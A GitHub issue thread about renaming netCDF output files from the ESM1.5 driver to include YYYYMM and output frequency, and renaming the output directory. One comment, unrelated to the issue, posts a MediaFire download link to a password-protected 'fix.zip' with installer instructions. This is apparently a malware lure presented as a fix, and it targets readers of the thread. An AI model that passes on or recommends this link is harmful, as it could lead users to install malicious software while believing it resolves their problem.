### ISSUE TITLE
ESM1.5 driver output file names

### ISSUE THREAD

**Issue by blimlim** [ACCESS-NRI/um2nc-standalone#91]
As [discussed here](https://github.com/ACCESS-NRI/access-esm1.5-configs/issues/59#issuecomment-2311624726) the netCDF file names written using the ESM1.5 driver should be modified to include `YYYYMM` and the type of output (daily/monthly) to match the naming style in `/g/data/p73/archive/CMIP6/ACCESS-ESM1-5/`. The `NetCDF` output directory should also be renamed `netCDF`.

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by blimlim** [comment]
Closes with #93
